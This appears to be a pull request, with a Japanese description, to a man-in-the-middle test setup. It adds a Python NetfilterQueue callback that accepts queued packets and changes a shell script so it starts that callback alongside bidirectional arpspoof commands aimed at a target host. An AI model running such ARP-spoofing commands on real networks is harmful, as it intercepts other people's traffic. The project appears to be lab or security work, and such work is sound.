### PR TITLE
feat: コマンド一発で疎通確認ができるように

### DIFF
--- a/mitm/proxy-test.py
+++ b/mitm/proxy-test.py
@@ -1,20 +1,15 @@
 from netfilterqueue import NetfilterQueue
 from scapy.all import IP
 
-pkt = None
 
-
-def callback(packet):
-    global pkt
+def proxy_callback(packet):
     pkt = IP(packet.get_payload())
-    pkt.show()
     packet.accept()
 
 
-nfqueue = NetfilterQueue()
-nfqueue.bind(0, callback)
-
 try:
+    nfqueue = NetfilterQueue()
+    nfqueue.bind(0, proxy_callback)
     nfqueue.run()
 except KeyboardInterrupt:
     pass

--- a/mitm/proxy-test.sh
+++ b/mitm/proxy-test.sh
@@ -16,9 +16,11 @@ function end() {
   echo "Shutdown now..."
   kill $PID1
   kill $PID2
+  kill $PID3
   iptables -F
   wait $PID1
   wait $PID2
+  wait $PID3
 }
 
 echo 1 > /proc/sys/net/ipv4/ip_forward
@@ -31,5 +33,8 @@ arpspoof -i $interface -t $target $attacker > arpspoof.log 2>&1 &
 PID1=$!
 arpspoof -i $interface -t $attacker $target > arpspoof.log 2>&1 &
 PID2=$!
+
+python3 proxy-test.py 2>&1 &
+PID3=$!
 
 cat


### PR DESCRIPTION
## Overview
setup.shの特性上パケットをエンキューするだけで、デキューする処理が入っていなかった。

そのため、リクエストをクライアントから送った際に送ったきりでレスポンスが返ってこない問題があった。

今後疎通確認時に攻撃用スクリプトを毎回起動してデキューしてしまうと意図されない攻撃が実行されてしまうので、デキューするコードのみを実装し、コマンド一発でそれを実行できるようにした。
